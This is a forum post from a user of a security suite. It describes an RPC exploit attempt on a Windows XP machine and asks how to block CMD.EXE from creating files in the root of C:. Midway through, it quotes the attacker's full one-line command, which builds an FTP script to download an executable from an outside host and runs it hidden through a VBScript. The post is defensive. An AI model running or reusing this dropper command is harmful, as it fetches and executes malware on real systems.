Once I installed CIS (ver 3.8.65951.477) and disabled the Windows firewall, it suddenly happened, soon after I connected to the Internet via a provider that assigns a public IP (it doesn't happen with another NATted provider), that I received an alert from F+ about an incoming connection to "System".
Well, later I found that it was an "always running" exploit attempt that targets the RPC service and the File & Printer Sharing service.
Even if WinXP SP2 RPC should be immune to this kind of exploit, once I allowed the incoming connection request the exploit went ahead and a new CMD.EXE process was created as a child of wmiprvse.exe.
Well… the CMD.EXE task was fired with these arguments:
cmd /c echo open f1tp.3322.org>c:\gz&& echo f1t>>c:\gz&& echo f1t>>c:\gz&& echo binary>>c:\gz&& echo get b.exe c:\aa.exe>>c:\gz&& echo bye>>c:\gz&& echo del c:\run.vbs>c:\a.bat&& echo del c:\a.bat>>c:\a.bat&& echo ftp -s:c:\gz>c:\ff.bat&& echo c:\aa.exe>>c:\ff.bat&& echo del c:\gz>>c:\ff.bat&& echo cmd /c c:\a.bat>>c:\ff.bat&& echo del c:\ff.bat>>c:\ff.bat&& echo CreateObject("WScript.Shell").Run "cmd /c c:\ff.bat",0 >c:\run.vbs&& c:\run.vbs
If it's not clear, that way CMD.EXE creates four files (gz, a.bat, ff.bat, run.vbs) and then runs the VBScript file (run.vbs).
That script launches, hidden, the batch file, which starts the ftp task that executes the ftp commands listed in the file "gz" to download the executable file aa.exe; once the malware is downloaded it is then started.
Of course, thanks to CIS, I was able to follow all the steps and stop the process before the VBScript file was executed… then I downloaded the malware myself and sent it to VirusTotal for a check.
That said, this is the main question:
How do I prevent CMD.EXE from creating/modifying files in the root folder of the C: partition?
I went to "Computer Security Policy" and then edited the CMD.EXE "Protected File/Folders" Access Rights and added "C:*" to the "Blocked Files/Folders"… however it doesn't seem to work.
I made a test batch file that creates a C:\Temp.txt file and then runs FTP; and even in Paranoid mode, D+ intercepts the attempt to run the ftp executable but neither intercepts nor prevents CMD.EXE from creating the C:\Temp.txt file.
I was able to get something similar to what I want by creating a new "System partition root" group inside "My Protected Files" that points to "C:*".
This way, while in "paranoid mode", D+ intercepts the CMD.EXE file creation attempt, but it also intercepts the modification attempts to any files on C: by all the running tasks that don't have "allow" in their "Protected File/Folders" Access Rights.
Is there a way to protect just the main level folder, excluding the sub-folders?
Is there a way to intercept file creation/modification attempts from just CMD.EXE?
Any help/advice will be greatly appreciated.